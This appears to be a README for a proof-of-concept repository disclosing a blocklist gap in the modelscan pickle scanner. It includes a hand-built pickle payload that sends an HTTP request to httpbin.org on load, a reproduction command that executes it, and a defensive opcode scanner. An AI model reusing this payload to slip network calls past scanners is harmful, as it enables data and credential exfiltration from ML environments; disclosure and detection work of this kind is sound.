---
tags:
- security-research
- modelscan-bypass
license: mit
---

# ModelScan Bypass PoC: http.client SSRF

**Security research only. Do not use maliciously.**

This repository demonstrates a bypass in ProtectAI's `modelscan` scanner (v0.8.8).

## Vulnerability

modelscan blocks `httplib` (the Python 2 module name) in its `unsafe_globals` list,
but does NOT block `http.client` (the Python 3 equivalent).

This allows creation of pickle files that:

1. Create HTTP/HTTPS connections to arbitrary servers
2. Send HTTP requests with attacker-controlled data
3. Exfiltrate data from the model loading environment

All while modelscan reports "No issues found".

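For context, the gap needs nothing more exotic than protocol 0 pickle opcodes. The sketch below is hypothetical (the bundled `model.pkl` may be built differently), and it assumes `operator.methodcaller` also passes the blocklist, since a single `REDUCE` can only make one call and the method call has to be chained somehow. `pickletools.dis` parses the stream without executing it:

```python
import io
import pickletools

# Hand-assembled protocol 0 pickle stream. On pickle.loads() it evaluates to
#   operator.methodcaller('request', 'GET', '/get?exfil=pwned')(
#       http.client.HTTPSConnection('httpbin.org'))
# i.e. it opens a TLS connection and sends the GET at load time. Using
# operator.methodcaller to chain the method call is an assumption of this
# sketch, not necessarily how model.pkl is built.
payload = (
    b"coperator\nmethodcaller\n"                    # GLOBAL operator.methodcaller
    b"(S'request'\nS'GET'\nS'/get?exfil=pwned'\nt"  # ('request', 'GET', '/get?exfil=pwned')
    b"R"                                            # REDUCE -> methodcaller instance
    b"(chttp.client\nHTTPSConnection\n"             # GLOBAL http.client.HTTPSConnection
    b"(S'httpbin.org'\ntR"                          # REDUCE -> HTTPSConnection('httpbin.org')
    b"t"                                            # 1-tuple: (connection,)
    b"R"                                            # REDUCE -> conn.request(...) fires
    b"."                                            # STOP
)

# Disassemble without executing: confirms the opcode stream is well-formed and
# that the only modules it names are operator and http.client.
pickletools.dis(payload, io.StringIO())
```

The only imports the stream names are `operator` and `http.client`; if neither appears in `unsafe_globals`, a GLOBAL-opcode blocklist has nothing to flag.
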
## Files

- `model.pkl` — Pickle file that sends an HTTP GET request on load
- `pytorch_model.bin` — Same payload in PyTorch format

## Reproduction

```bash
pip install modelscan==0.8.8
modelscan scan -p model.pkl
# Output: "No issues found"

python3 -c "import pickle; pickle.loads(open('model.pkl','rb').read())"
# Sends HTTP request to httpbin.org/get?exfil=pwned
```

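Until the blocklist covers `http.client`, a suspect file can be triaged without ever loading it: walk its import opcodes with `pickletools.genops` and flag network-capable modules. The watchlist below is illustrative, not modelscan's actual `unsafe_globals` list:

```python
import pickletools

# Illustrative watchlist -- not modelscan's actual unsafe_globals list.
NETWORK_MODULES = {"http.client", "httplib", "socket", "urllib.request"}

def find_network_globals(data: bytes):
    """Return (offset, 'module name') pairs for GLOBAL opcodes that reference
    network-capable modules, without executing the pickle."""
    hits = []
    for opcode, arg, pos in pickletools.genops(data):
        # GLOBAL carries its target as a "module name" string. STACK_GLOBAL
        # (protocol 4+) resolves the target from the stack, so arg is None
        # there and would need deeper analysis.
        if opcode.name == "GLOBAL" and arg:
            module = arg.split(" ")[0]
            if module in NETWORK_MODULES:
                hits.append((pos, arg))
    return hits

# Example: a harmless pickle that merely names http.client.HTTPSConnection.
sample = b"chttp.client\nHTTPSConnection\n0N."
print(find_network_globals(sample))  # -> [(0, 'http.client HTTPSConnection')]
```

Because `genops` only parses the opcode stream, this check is safe to run on untrusted files, unlike the `pickle.loads` call above.
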
## Impact

- SSRF from model loading
- Data exfiltration from ML environments
- Credential theft via outbound HTTP requests